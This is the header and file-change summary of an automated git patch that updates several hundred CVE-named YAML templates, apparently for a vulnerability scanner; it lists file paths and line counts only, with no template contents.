From db3abf5beb1e46836db7847e1eb67f395018f61f Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 25 Oct 2023 12:04:43 +0000 Subject: [PATCH] TemplateMan Update [Wed Oct 25 12:04:43 UTC 2023] :robot: --- file/url-analyse/url-extension-inspector.yaml | 3 +- http/cves/2000/CVE-2000-0114.yaml | 3 +- http/cves/2002/CVE-2002-1131.yaml | 3 +- http/cves/2004/CVE-2004-0519.yaml | 3 +- http/cves/2004/CVE-2004-1965.yaml | 3 +- http/cves/2005/CVE-2005-2428.yaml | 3 +- http/cves/2005/CVE-2005-3344.yaml | 3 +- http/cves/2005/CVE-2005-3634.yaml | 3 +- http/cves/2005/CVE-2005-4385.yaml | 3 +- http/cves/2006/CVE-2006-1681.yaml | 3 +- http/cves/2006/CVE-2006-2842.yaml | 3 +- http/cves/2007/CVE-2007-0885.yaml | 3 +- http/cves/2007/CVE-2007-4504.yaml | 3 +- http/cves/2007/CVE-2007-5728.yaml | 3 +- http/cves/2008/CVE-2008-1059.yaml | 3 +- http/cves/2008/CVE-2008-1061.yaml | 3 +- http/cves/2008/CVE-2008-1547.yaml | 3 +- http/cves/2008/CVE-2008-2398.yaml | 3 +- http/cves/2008/CVE-2008-2650.yaml | 3 +- http/cves/2008/CVE-2008-4668.yaml | 3 +- http/cves/2008/CVE-2008-4764.yaml | 3 +- http/cves/2008/CVE-2008-5587.yaml | 3 +- http/cves/2008/CVE-2008-6080.yaml | 3 +- http/cves/2008/CVE-2008-6172.yaml | 3 +- http/cves/2008/CVE-2008-6222.yaml | 3 +- http/cves/2008/CVE-2008-6668.yaml | 3 +- http/cves/2008/CVE-2008-6982.yaml | 3 +- http/cves/2008/CVE-2008-7269.yaml | 3 +- http/cves/2009/CVE-2009-0347.yaml | 3 +- http/cves/2009/CVE-2009-0932.yaml | 3 +- http/cves/2009/CVE-2009-1151.yaml | 3 +- http/cves/2009/CVE-2009-1496.yaml | 3 +- http/cves/2009/CVE-2009-1558.yaml | 3 +- http/cves/2009/CVE-2009-1872.yaml | 3 +- http/cves/2009/CVE-2009-2015.yaml | 3 +- http/cves/2009/CVE-2009-2100.yaml | 3 +- http/cves/2009/CVE-2009-3053.yaml | 3 +- http/cves/2009/CVE-2009-3318.yaml | 3 +- http/cves/2009/CVE-2009-4202.yaml | 3 +- http/cves/2009/CVE-2009-4223.yaml | 3 +- http/cves/2009/CVE-2009-4679.yaml | 3 +- http/cves/2009/CVE-2009-5020.yaml | 3 +- http/cves/2009/CVE-2009-5114.yaml | 3 +- http/cves/2010/CVE-2010-0157.yaml | 3 +- http/cves/2010/CVE-2010-0467.yaml | 3 +- http/cves/2010/CVE-2010-0759.yaml | 3 +- http/cves/2010/CVE-2010-0942.yaml | 3 +- http/cves/2010/CVE-2010-0943.yaml | 3 +- http/cves/2010/CVE-2010-0944.yaml | 3 +- http/cves/2010/CVE-2010-0972.yaml | 3 +- http/cves/2010/CVE-2010-0982.yaml | 3 +- http/cves/2010/CVE-2010-0985.yaml | 3 +- http/cves/2010/CVE-2010-1056.yaml | 3 +- http/cves/2010/CVE-2010-1081.yaml | 3 +- http/cves/2010/CVE-2010-1217.yaml | 3 +- http/cves/2010/CVE-2010-1219.yaml | 3 +- http/cves/2010/CVE-2010-1302.yaml | 3 +- http/cves/2010/CVE-2010-1304.yaml | 3 +- http/cves/2010/CVE-2010-1305.yaml | 3 +- http/cves/2010/CVE-2010-1306.yaml | 3 +- http/cves/2010/CVE-2010-1307.yaml | 3 +- http/cves/2010/CVE-2010-1308.yaml | 3 +- http/cves/2010/CVE-2010-1312.yaml | 3 +- http/cves/2010/CVE-2010-1313.yaml | 3 +- http/cves/2010/CVE-2010-1314.yaml | 3 +- http/cves/2010/CVE-2010-1315.yaml | 3 +- http/cves/2010/CVE-2010-1340.yaml | 3 +- http/cves/2010/CVE-2010-1345.yaml | 3 +- http/cves/2010/CVE-2010-1352.yaml | 3 +- http/cves/2010/CVE-2010-1353.yaml | 3 +- http/cves/2010/CVE-2010-1354.yaml | 3 +- http/cves/2010/CVE-2010-1429.yaml | 3 +- http/cves/2010/CVE-2010-1461.yaml | 3 +- http/cves/2010/CVE-2010-1469.yaml | 3 +- http/cves/2010/CVE-2010-1470.yaml | 3 +- http/cves/2010/CVE-2010-1471.yaml | 3 +- http/cves/2010/CVE-2010-1472.yaml | 3 +- http/cves/2010/CVE-2010-1473.yaml | 3 +- http/cves/2010/CVE-2010-1474.yaml | 3 +- http/cves/2010/CVE-2010-1475.yaml | 3 +- http/cves/2010/CVE-2010-1476.yaml | 3 +- http/cves/2010/CVE-2010-1478.yaml | 3 +- http/cves/2010/CVE-2010-1491.yaml | 3 +- http/cves/2010/CVE-2010-1495.yaml | 3 +- http/cves/2010/CVE-2010-1531.yaml | 3 +- http/cves/2010/CVE-2010-1532.yaml | 3 +- http/cves/2010/CVE-2010-1533.yaml | 3 +- http/cves/2010/CVE-2010-1534.yaml | 3 +- http/cves/2010/CVE-2010-1535.yaml | 3 +- http/cves/2010/CVE-2010-1540.yaml | 3 +- http/cves/2010/CVE-2010-1586.yaml | 3 +- http/cves/2010/CVE-2010-1601.yaml | 3 +- http/cves/2010/CVE-2010-1602.yaml | 3 +- http/cves/2010/CVE-2010-1603.yaml | 3 +- http/cves/2010/CVE-2010-1607.yaml | 3 +- http/cves/2010/CVE-2010-1653.yaml | 3 +- http/cves/2010/CVE-2010-1657.yaml | 3 +- http/cves/2010/CVE-2010-1658.yaml | 3 +- http/cves/2010/CVE-2010-1659.yaml | 3 +- http/cves/2010/CVE-2010-1714.yaml | 3 +- http/cves/2010/CVE-2010-1715.yaml | 3 +- http/cves/2010/CVE-2010-1717.yaml | 3 +- http/cves/2010/CVE-2010-1718.yaml | 3 +- http/cves/2010/CVE-2010-1719.yaml | 3 +- http/cves/2010/CVE-2010-1722.yaml | 3 +- http/cves/2010/CVE-2010-1723.yaml | 3 +- http/cves/2010/CVE-2010-1858.yaml | 3 +- http/cves/2010/CVE-2010-1870.yaml | 3 +- http/cves/2010/CVE-2010-1875.yaml | 3 +- http/cves/2010/CVE-2010-1878.yaml | 3 +- http/cves/2010/CVE-2010-1952.yaml | 3 +- http/cves/2010/CVE-2010-1953.yaml | 3 +- http/cves/2010/CVE-2010-1954.yaml | 3 +- http/cves/2010/CVE-2010-1955.yaml | 3 +- http/cves/2010/CVE-2010-1956.yaml | 3 +- http/cves/2010/CVE-2010-1957.yaml | 3 +- http/cves/2010/CVE-2010-1977.yaml | 3 +- http/cves/2010/CVE-2010-1979.yaml | 3 +- http/cves/2010/CVE-2010-1980.yaml | 3 +- http/cves/2010/CVE-2010-1981.yaml | 3 +- http/cves/2010/CVE-2010-1982.yaml | 3 +- http/cves/2010/CVE-2010-1983.yaml | 3 +- http/cves/2010/CVE-2010-2033.yaml | 3 +- http/cves/2010/CVE-2010-2034.yaml | 3 +- http/cves/2010/CVE-2010-2035.yaml | 3 +- http/cves/2010/CVE-2010-2036.yaml | 3 +- http/cves/2010/CVE-2010-2037.yaml | 3 +- http/cves/2010/CVE-2010-2045.yaml | 3 +- http/cves/2010/CVE-2010-2050.yaml | 3 +- http/cves/2010/CVE-2010-2122.yaml | 3 +- http/cves/2010/CVE-2010-2128.yaml | 3 +- http/cves/2010/CVE-2010-2259.yaml | 3 +- http/cves/2010/CVE-2010-2307.yaml | 3 +- http/cves/2010/CVE-2010-2507.yaml | 3 +- http/cves/2010/CVE-2010-2680.yaml | 3 +- http/cves/2010/CVE-2010-2682.yaml | 3 +- http/cves/2010/CVE-2010-2857.yaml | 3 +- http/cves/2010/CVE-2010-2861.yaml | 3 +- http/cves/2010/CVE-2010-2918.yaml | 3 +- http/cves/2010/CVE-2010-2920.yaml | 3 +- http/cves/2010/CVE-2010-3203.yaml | 3 +- http/cves/2010/CVE-2010-3426.yaml | 3 +- http/cves/2010/CVE-2010-4231.yaml | 3 +- http/cves/2010/CVE-2010-4239.yaml | 3 +- http/cves/2010/CVE-2010-4282.yaml | 3 +- http/cves/2010/CVE-2010-4617.yaml | 3 +- http/cves/2010/CVE-2010-4719.yaml | 3 +- http/cves/2010/CVE-2010-4769.yaml | 3 +- http/cves/2010/CVE-2010-4977.yaml | 3 +- http/cves/2010/CVE-2010-5028.yaml | 3 +- http/cves/2010/CVE-2010-5278.yaml | 3 +- http/cves/2010/CVE-2010-5286.yaml | 3 +- http/cves/2011/CVE-2011-0049.yaml | 3 +- http/cves/2011/CVE-2011-1669.yaml | 3 +- http/cves/2011/CVE-2011-2744.yaml | 3 +- http/cves/2011/CVE-2011-2780.yaml | 3 +- http/cves/2011/CVE-2011-3315.yaml | 3 +- http/cves/2011/CVE-2011-4336.yaml | 3 +- http/cves/2011/CVE-2011-4624.yaml | 3 +- http/cves/2011/CVE-2011-4804.yaml | 3 +- http/cves/2011/CVE-2011-4926.yaml | 3 +- http/cves/2011/CVE-2011-5106.yaml | 3 +- http/cves/2011/CVE-2011-5107.yaml | 3 +- http/cves/2011/CVE-2011-5179.yaml | 3 +- http/cves/2011/CVE-2011-5181.yaml | 3 +- http/cves/2011/CVE-2011-5252.yaml | 3 +- http/cves/2011/CVE-2011-5265.yaml | 3 +- http/cves/2012/CVE-2012-0901.yaml | 3 +- http/cves/2012/CVE-2012-0981.yaml | 3 +- http/cves/2012/CVE-2012-0996.yaml | 3 +- http/cves/2012/CVE-2012-1226.yaml | 3 +- http/cves/2012/CVE-2012-1835.yaml | 3 +- http/cves/2012/CVE-2012-2371.yaml | 3 +- http/cves/2012/CVE-2012-4032.yaml | 3 +- http/cves/2012/CVE-2012-4242.yaml | 3 +- http/cves/2012/CVE-2012-4253.yaml | 3 +- http/cves/2012/CVE-2012-4273.yaml | 3 +- http/cves/2012/CVE-2012-4547.yaml | 3 +- http/cves/2012/CVE-2012-4768.yaml | 3 +- http/cves/2012/CVE-2012-4878.yaml | 3 +- http/cves/2012/CVE-2012-4889.yaml | 3 +- http/cves/2012/CVE-2012-4940.yaml | 3 +- http/cves/2012/CVE-2012-4982.yaml | 3 +- http/cves/2012/CVE-2012-5321.yaml | 3 +- http/cves/2012/CVE-2012-5913.yaml | 3 +- http/cves/2012/CVE-2012-6499.yaml | 3 +- http/cves/2013/CVE-2013-1965.yaml | 3 +- http/cves/2013/CVE-2013-2248.yaml | 3 +- http/cves/2013/CVE-2013-2251.yaml | 3 +- http/cves/2013/CVE-2013-2287.yaml | 3 +- http/cves/2013/CVE-2013-2621.yaml | 3 +- http/cves/2013/CVE-2013-3526.yaml | 3 +- http/cves/2013/CVE-2013-3827.yaml | 3 +- http/cves/2013/CVE-2013-4117.yaml | 3 +- http/cves/2013/CVE-2013-4625.yaml | 3 +- http/cves/2013/CVE-2013-5528.yaml | 3 +- http/cves/2013/CVE-2013-5979.yaml | 3 +- http/cves/2013/CVE-2013-6281.yaml | 3 +- http/cves/2013/CVE-2013-7240.yaml | 3 +- http/cves/2013/CVE-2013-7285.yaml | 3 +- http/cves/2014/CVE-2014-1203.yaml | 3 +- http/cves/2014/CVE-2014-2321.yaml | 3 +- http/cves/2014/CVE-2014-2962.yaml | 3 +- http/cves/2014/CVE-2014-3120.yaml | 3 +- http/cves/2014/CVE-2014-3206.yaml | 3 +- http/cves/2014/CVE-2014-3744.yaml | 3 +- http/cves/2014/CVE-2014-4210.yaml | 3 +- http/cves/2014/CVE-2014-4513.yaml | 3 +- http/cves/2014/CVE-2014-4535.yaml | 3 +- http/cves/2014/CVE-2014-4536.yaml | 3 +- http/cves/2014/CVE-2014-4539.yaml | 3 +- http/cves/2014/CVE-2014-4544.yaml | 3 +- http/cves/2014/CVE-2014-4550.yaml | 3 +- http/cves/2014/CVE-2014-4558.yaml | 3 +- http/cves/2014/CVE-2014-4561.yaml | 3 +- http/cves/2014/CVE-2014-4592.yaml | 3 +- http/cves/2014/CVE-2014-4940.yaml | 3 +- http/cves/2014/CVE-2014-4942.yaml | 3 +- http/cves/2014/CVE-2014-5111.yaml | 3 +- http/cves/2014/CVE-2014-5258.yaml | 3 +- http/cves/2014/CVE-2014-5368.yaml | 3 +- http/cves/2014/CVE-2014-6308.yaml | 3 +- http/cves/2014/CVE-2014-8676.yaml | 3 +- http/cves/2014/CVE-2014-8682.yaml | 3 +- http/cves/2014/CVE-2014-9094.yaml | 3 +- http/cves/2014/CVE-2014-9119.yaml | 3 +- http/cves/2014/CVE-2014-9180.yaml | 3 +- http/cves/2014/CVE-2014-9444.yaml | 3 +- http/cves/2014/CVE-2014-9606.yaml | 3 +- http/cves/2014/CVE-2014-9607.yaml | 3 +- http/cves/2014/CVE-2014-9608.yaml | 3 +- http/cves/2014/CVE-2014-9609.yaml | 3 +- http/cves/2014/CVE-2014-9614.yaml | 3 +- http/cves/2014/CVE-2014-9615.yaml | 3 +- http/cves/2014/CVE-2014-9617.yaml | 3 +- http/cves/2014/CVE-2014-9618.yaml | 3 +- http/cves/2015/CVE-2015-0554.yaml | 3 +- http/cves/2015/CVE-2015-1000005.yaml | 3 +- http/cves/2015/CVE-2015-1000010.yaml | 3 +- http/cves/2015/CVE-2015-1000012.yaml | 3 +- http/cves/2015/CVE-2015-1427.yaml | 3 +- http/cves/2015/CVE-2015-1503.yaml | 3 +- http/cves/2015/CVE-2015-1880.yaml | 3 +- http/cves/2015/CVE-2015-2067.yaml | 3 +- http/cves/2015/CVE-2015-2068.yaml | 3 +- http/cves/2015/CVE-2015-2166.yaml | 3 +- http/cves/2015/CVE-2015-2196.yaml | 3 +- http/cves/2015/CVE-2015-2755.yaml | 3 +- http/cves/2015/CVE-2015-2807.yaml | 3 +- http/cves/2015/CVE-2015-2863.yaml | 3 +- http/cves/2015/CVE-2015-2996.yaml | 3 +- http/cves/2015/CVE-2015-3035.yaml | 3 +- http/cves/2015/CVE-2015-3337.yaml | 3 +- http/cves/2015/CVE-2015-3648.yaml | 3 +- http/cves/2015/CVE-2015-3897.yaml | 3 +- http/cves/2015/CVE-2015-4050.yaml | 3 +- http/cves/2015/CVE-2015-4062.yaml | 3 +- http/cves/2015/CVE-2015-4063.yaml | 3 +- http/cves/2015/CVE-2015-4127.yaml | 3 +- http/cves/2015/CVE-2015-4414.yaml | 3 +- http/cves/2015/CVE-2015-4632.yaml | 3 +- http/cves/2015/CVE-2015-4666.yaml | 3 +- http/cves/2015/CVE-2015-4668.yaml | 3 +- http/cves/2015/CVE-2015-5354.yaml | 3 +- http/cves/2015/CVE-2015-5461.yaml | 3 +- http/cves/2015/CVE-2015-5469.yaml | 3 +- http/cves/2015/CVE-2015-5471.yaml | 3 +- http/cves/2015/CVE-2015-5688.yaml | 3 +- http/cves/2015/CVE-2015-6477.yaml | 3 +- http/cves/2015/CVE-2015-6544.yaml | 3 +- http/cves/2015/CVE-2015-6920.yaml | 3 +- http/cves/2015/CVE-2015-7245.yaml | 3 +- http/cves/2015/CVE-2015-7377.yaml | 3 +- http/cves/2015/CVE-2015-7780.yaml | 3 +- http/cves/2015/CVE-2015-7823.yaml | 3 +- http/cves/2015/CVE-2015-8349.yaml | 3 +- http/cves/2015/CVE-2015-8399.yaml | 3 +- http/cves/2015/CVE-2015-8813.yaml | 3 +- http/cves/2015/CVE-2015-9323.yaml | 3 +- http/cves/2015/CVE-2015-9414.yaml | 3 +- http/cves/2015/CVE-2015-9480.yaml | 3 +- http/cves/2016/CVE-2016-0957.yaml | 3 +- http/cves/2016/CVE-2016-1000126.yaml | 3 +- http/cves/2016/CVE-2016-1000127.yaml | 3 +- http/cves/2016/CVE-2016-1000128.yaml | 3 +- http/cves/2016/CVE-2016-1000129.yaml | 3 +- http/cves/2016/CVE-2016-1000130.yaml | 3 +- http/cves/2016/CVE-2016-1000131.yaml | 3 +- http/cves/2016/CVE-2016-1000132.yaml | 3 +- http/cves/2016/CVE-2016-1000133.yaml | 3 +- http/cves/2016/CVE-2016-1000134.yaml | 3 +- http/cves/2016/CVE-2016-1000135.yaml | 3 +- http/cves/2016/CVE-2016-1000136.yaml | 3 +- http/cves/2016/CVE-2016-1000137.yaml | 3 +- http/cves/2016/CVE-2016-1000138.yaml | 3 +- http/cves/2016/CVE-2016-1000139.yaml | 3 +- http/cves/2016/CVE-2016-1000140.yaml | 3 +- http/cves/2016/CVE-2016-1000141.yaml | 3 +- http/cves/2016/CVE-2016-1000142.yaml | 3 +- http/cves/2016/CVE-2016-1000143.yaml | 3 +- http/cves/2016/CVE-2016-1000146.yaml | 3 +- http/cves/2016/CVE-2016-1000148.yaml | 3 +- http/cves/2016/CVE-2016-1000149.yaml | 3 +- http/cves/2016/CVE-2016-1000152.yaml | 3 +- http/cves/2016/CVE-2016-1000153.yaml | 3 +- http/cves/2016/CVE-2016-1000154.yaml | 3 +- http/cves/2016/CVE-2016-1000155.yaml | 3 +- http/cves/2016/CVE-2016-10033.yaml | 3 +- http/cves/2016/CVE-2016-10108.yaml | 3 +- http/cves/2016/CVE-2016-10134.yaml | 3 +- http/cves/2016/CVE-2016-10367.yaml | 3 +- http/cves/2016/CVE-2016-10368.yaml | 3 +- http/cves/2016/CVE-2016-10924.yaml | 3 +- http/cves/2016/CVE-2016-10956.yaml | 3 +- http/cves/2016/CVE-2016-10960.yaml | 3 +- http/cves/2016/CVE-2016-10973.yaml | 3 +- http/cves/2016/CVE-2016-10993.yaml | 3 +- http/cves/2016/CVE-2016-2389.yaml | 3 +- http/cves/2016/CVE-2016-3088.yaml | 3 +- http/cves/2016/CVE-2016-3978.yaml | 3 +- http/cves/2016/CVE-2016-4975.yaml | 3 +- http/cves/2016/CVE-2016-4977.yaml | 3 +- http/cves/2016/CVE-2016-5649.yaml | 2 +- http/cves/2016/CVE-2016-6195.yaml | 3 +- http/cves/2016/CVE-2016-7834.yaml | 3 +- http/cves/2016/CVE-2016-7981.yaml | 3 +- http/cves/2016/CVE-2016-8527.yaml | 3 +- http/cves/2017/CVE-2017-0929.yaml | 3 +- http/cves/2017/CVE-2017-1000029.yaml | 3 +- http/cves/2017/CVE-2017-1000163.yaml | 3 +- http/cves/2017/CVE-2017-1000170.yaml | 3 +- http/cves/2017/CVE-2017-1000486.yaml | 3 +- http/cves/2017/CVE-2017-10075.yaml | 3 +- http/cves/2017/CVE-2017-10271.yaml | 3 +- http/cves/2017/CVE-2017-10974.yaml | 3 +- http/cves/2017/CVE-2017-11165.yaml | 3 +- http/cves/2017/CVE-2017-11444.yaml | 3 +- http/cves/2017/CVE-2017-11512.yaml | 3 +- http/cves/2017/CVE-2017-11586.yaml | 3 +- http/cves/2017/CVE-2017-11629.yaml | 3 +- http/cves/2017/CVE-2017-12138.yaml | 3 +- http/cves/2017/CVE-2017-12544.yaml | 3 +- http/cves/2017/CVE-2017-12583.yaml | 3 +- http/cves/2017/CVE-2017-12611.yaml | 3 +- http/cves/2017/CVE-2017-12615.yaml | 3 +- http/cves/2017/CVE-2017-12629.yaml | 3 +- http/cves/2017/CVE-2017-12637.yaml | 3 +- http/cves/2017/CVE-2017-12794.yaml | 3 +- http/cves/2017/CVE-2017-14135.yaml | 3 +- http/cves/2017/CVE-2017-14186.yaml | 3 +- http/cves/2017/CVE-2017-14524.yaml | 3 +- http/cves/2017/CVE-2017-14535.yaml | 3 +- http/cves/2017/CVE-2017-14622.yaml | 3 +- http/cves/2017/CVE-2017-14651.yaml | 3 +- http/cves/2017/CVE-2017-14849.yaml | 3 +- http/cves/2017/CVE-2017-15287.yaml | 3 +- http/cves/2017/CVE-2017-15363.yaml | 3 +- http/cves/2017/CVE-2017-15647.yaml | 3 +- http/cves/2017/CVE-2017-16806.yaml | 3 +- http/cves/2017/CVE-2017-16877.yaml | 3 +- http/cves/2017/CVE-2017-16894.yaml | 3 +- http/cves/2017/CVE-2017-17059.yaml | 3 +- http/cves/2017/CVE-2017-17451.yaml | 3 +- http/cves/2017/CVE-2017-17562.yaml | 3 +- http/cves/2017/CVE-2017-17731.yaml | 3 +- http/cves/2017/CVE-2017-17736.yaml | 3 +- http/cves/2017/CVE-2017-18024.yaml | 3 +- http/cves/2017/CVE-2017-18487.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18490.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18491.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18492.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18493.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18494.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18496.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18500.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18501.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18502.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18505.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18516.yaml | 104 ++++++++++-------- http/cves/2017/CVE-2017-18517.yaml | 104 ++++++++++-------- http/cves/2017/CVE-2017-18518.yaml | 104 ++++++++++-------- http/cves/2017/CVE-2017-18527.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18528.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18529.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18530.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18532.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18537.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18542.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18556.yaml | 104 ++++++++++-------- http/cves/2017/CVE-2017-18557.yaml | 104 ++++++++++-------- http/cves/2017/CVE-2017-18558.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18562.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18564.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18565.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18566.yaml | 102 +++++++++-------- http/cves/2017/CVE-2017-18598.yaml | 3 +- http/cves/2017/CVE-2017-18638.yaml | 3 +- http/cves/2017/CVE-2017-3506.yaml | 3 +- http/cves/2017/CVE-2017-3528.yaml | 3 +- http/cves/2017/CVE-2017-4011.yaml | 3 +- http/cves/2017/CVE-2017-5631.yaml | 3 +- http/cves/2017/CVE-2017-5689.yaml | 3 +- http/cves/2017/CVE-2017-5982.yaml | 3 +- http/cves/2017/CVE-2017-7391.yaml | 3 +- http/cves/2017/CVE-2017-7921.yaml | 3 +- http/cves/2017/CVE-2017-7925.yaml | 3 +- http/cves/2017/CVE-2017-9288.yaml | 3 +- http/cves/2017/CVE-2017-9416.yaml | 3 +- http/cves/2017/CVE-2017-9506.yaml | 3 +- http/cves/2017/CVE-2017-9791.yaml | 3 +- http/cves/2017/CVE-2017-9822.yaml | 3 +- http/cves/2017/CVE-2017-9833.yaml | 3 +- http/cves/2018/CVE-2018-0127.yaml | 5 +- http/cves/2018/CVE-2018-1000129.yaml | 3 +- http/cves/2018/CVE-2018-1000130.yaml | 3 +- http/cves/2018/CVE-2018-1000226.yaml | 3 +- http/cves/2018/CVE-2018-1000671.yaml | 3 +- http/cves/2018/CVE-2018-1000856.yaml | 3 +- http/cves/2018/CVE-2018-10093.yaml | 3 +- http/cves/2018/CVE-2018-10141.yaml | 3 +- http/cves/2018/CVE-2018-10201.yaml | 3 +- http/cves/2018/CVE-2018-10230.yaml | 3 +- http/cves/2018/CVE-2018-10822.yaml | 3 +- http/cves/2018/CVE-2018-10823.yaml | 3 +- http/cves/2018/CVE-2018-10956.yaml | 3 +- http/cves/2018/CVE-2018-11227.yaml | 3 +- http/cves/2018/CVE-2018-11231.yaml | 3 +- http/cves/2018/CVE-2018-11409.yaml | 3 +- http/cves/2018/CVE-2018-11473.yaml | 3 +- http/cves/2018/CVE-2018-11709.yaml | 3 +- http/cves/2018/CVE-2018-11759.yaml | 3 +- http/cves/2018/CVE-2018-11784.yaml | 3 +- http/cves/2018/CVE-2018-12031.yaml | 3 +- http/cves/2018/CVE-2018-12054.yaml | 3 +- http/cves/2018/CVE-2018-1207.yaml | 3 +- http/cves/2018/CVE-2018-12095.yaml | 3 +- http/cves/2018/CVE-2018-12296.yaml | 3 +- http/cves/2018/CVE-2018-12300.yaml | 3 +- http/cves/2018/CVE-2018-12613.yaml | 3 +- http/cves/2018/CVE-2018-12634.yaml | 3 +- http/cves/2018/CVE-2018-12675.yaml | 3 +- http/cves/2018/CVE-2018-1271.yaml | 3 +- http/cves/2018/CVE-2018-1273.yaml | 3 +- http/cves/2018/CVE-2018-12909.yaml | 3 +- http/cves/2018/CVE-2018-12998.yaml | 3 +- http/cves/2018/CVE-2018-13380.yaml | 3 +- http/cves/2018/CVE-2018-13980.yaml | 3 +- http/cves/2018/CVE-2018-14013.yaml | 3 +- http/cves/2018/CVE-2018-14064.yaml | 3 +- http/cves/2018/CVE-2018-14474.yaml | 3 +- http/cves/2018/CVE-2018-14574.yaml | 3 +- http/cves/2018/CVE-2018-14728.yaml | 3 +- http/cves/2018/CVE-2018-14916.yaml | 3 +- http/cves/2018/CVE-2018-14918.yaml | 3 +- http/cves/2018/CVE-2018-14931.yaml | 3 +- http/cves/2018/CVE-2018-15138.yaml | 3 +- http/cves/2018/CVE-2018-15517.yaml | 3 +- http/cves/2018/CVE-2018-15917.yaml | 3 +- http/cves/2018/CVE-2018-15961.yaml | 3 +- http/cves/2018/CVE-2018-16059.yaml | 3 +- http/cves/2018/CVE-2018-16133.yaml | 3 +- http/cves/2018/CVE-2018-16139.yaml | 3 +- http/cves/2018/CVE-2018-16159.yaml | 3 +- http/cves/2018/CVE-2018-16167.yaml | 3 +- http/cves/2018/CVE-2018-16283.yaml | 3 +- http/cves/2018/CVE-2018-16288.yaml | 3 +- http/cves/2018/CVE-2018-16299.yaml | 3 +- http/cves/2018/CVE-2018-16668.yaml | 3 +- http/cves/2018/CVE-2018-16670.yaml | 3 +- http/cves/2018/CVE-2018-16671.yaml | 3 +- http/cves/2018/CVE-2018-16716.yaml | 3 +- http/cves/2018/CVE-2018-16761.yaml | 3 +- http/cves/2018/CVE-2018-16763.yaml | 3 +- http/cves/2018/CVE-2018-16836.yaml | 3 +- http/cves/2018/CVE-2018-16979.yaml | 3 +- http/cves/2018/CVE-2018-17246.yaml | 3 +- http/cves/2018/CVE-2018-17422.yaml | 3 +- http/cves/2018/CVE-2018-17431.yaml | 3 +- http/cves/2018/CVE-2018-18069.yaml | 3 +- http/cves/2018/CVE-2018-18570.yaml | 3 +- http/cves/2018/CVE-2018-18608.yaml | 3 +- http/cves/2018/CVE-2018-18775.yaml | 3 +- http/cves/2018/CVE-2018-18777.yaml | 3 +- http/cves/2018/CVE-2018-18809.yaml | 3 +- http/cves/2018/CVE-2018-18925.yaml | 3 +- http/cves/2018/CVE-2018-19136.yaml | 3 +- http/cves/2018/CVE-2018-19137.yaml | 3 +- http/cves/2018/CVE-2018-19287.yaml | 3 +- http/cves/2018/CVE-2018-19326.yaml | 3 +- http/cves/2018/CVE-2018-19365.yaml | 3 +- http/cves/2018/CVE-2018-19386.yaml | 3 +- http/cves/2018/CVE-2018-19439.yaml | 3 +- http/cves/2018/CVE-2018-19458.yaml | 3 +- http/cves/2018/CVE-2018-19749.yaml | 3 +- http/cves/2018/CVE-2018-19751.yaml | 3 +- http/cves/2018/CVE-2018-19752.yaml | 3 +- http/cves/2018/CVE-2018-19753.yaml | 3 +- http/cves/2018/CVE-2018-19877.yaml | 3 +- http/cves/2018/CVE-2018-19892.yaml | 3 +- http/cves/2018/CVE-2018-19914.yaml | 3 +- http/cves/2018/CVE-2018-19915.yaml | 3 +- http/cves/2018/CVE-2018-20009.yaml | 3 +- http/cves/2018/CVE-2018-20010.yaml | 3 +- http/cves/2018/CVE-2018-20011.yaml | 3 +- http/cves/2018/CVE-2018-20462.yaml | 3 +- http/cves/2018/CVE-2018-20463.yaml | 3 +- http/cves/2018/CVE-2018-20470.yaml | 3 +- http/cves/2018/CVE-2018-20526.yaml | 3 +- http/cves/2018/CVE-2018-20608.yaml | 3 +- http/cves/2018/CVE-2018-20824.yaml | 3 +- http/cves/2018/CVE-2018-20985.yaml | 3 +- http/cves/2018/CVE-2018-2392.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 3 +- http/cves/2018/CVE-2018-3167.yaml | 3 +- http/cves/2018/CVE-2018-3238.yaml | 3 +- http/cves/2018/CVE-2018-3714.yaml | 3 +- http/cves/2018/CVE-2018-3760.yaml | 3 +- http/cves/2018/CVE-2018-3810.yaml | 3 +- http/cves/2018/CVE-2018-5230.yaml | 3 +- http/cves/2018/CVE-2018-5233.yaml | 3 +- http/cves/2018/CVE-2018-5316.yaml | 3 +- http/cves/2018/CVE-2018-5715.yaml | 3 +- http/cves/2018/CVE-2018-6008.yaml | 3 +- http/cves/2018/CVE-2018-6184.yaml | 3 +- http/cves/2018/CVE-2018-6200.yaml | 3 +- http/cves/2018/CVE-2018-6530.yaml | 3 +- http/cves/2018/CVE-2018-6910.yaml | 3 +- http/cves/2018/CVE-2018-7251.yaml | 3 +- http/cves/2018/CVE-2018-7282.yaml | 3 +- http/cves/2018/CVE-2018-7467.yaml | 3 +- http/cves/2018/CVE-2018-7490.yaml | 3 +- http/cves/2018/CVE-2018-7653.yaml | 3 +- http/cves/2018/CVE-2018-7662.yaml | 3 +- http/cves/2018/CVE-2018-7700.yaml | 3 +- http/cves/2018/CVE-2018-7719.yaml | 3 +- http/cves/2018/CVE-2018-8033.yaml | 3 +- http/cves/2018/CVE-2018-8715.yaml | 3 +- http/cves/2018/CVE-2018-8719.yaml | 3 +- http/cves/2018/CVE-2018-8727.yaml | 3 +- http/cves/2018/CVE-2018-9118.yaml | 3 +- http/cves/2018/CVE-2018-9161.yaml | 3 +- http/cves/2018/CVE-2018-9205.yaml | 3 +- http/cves/2018/CVE-2018-9845.yaml | 3 +- 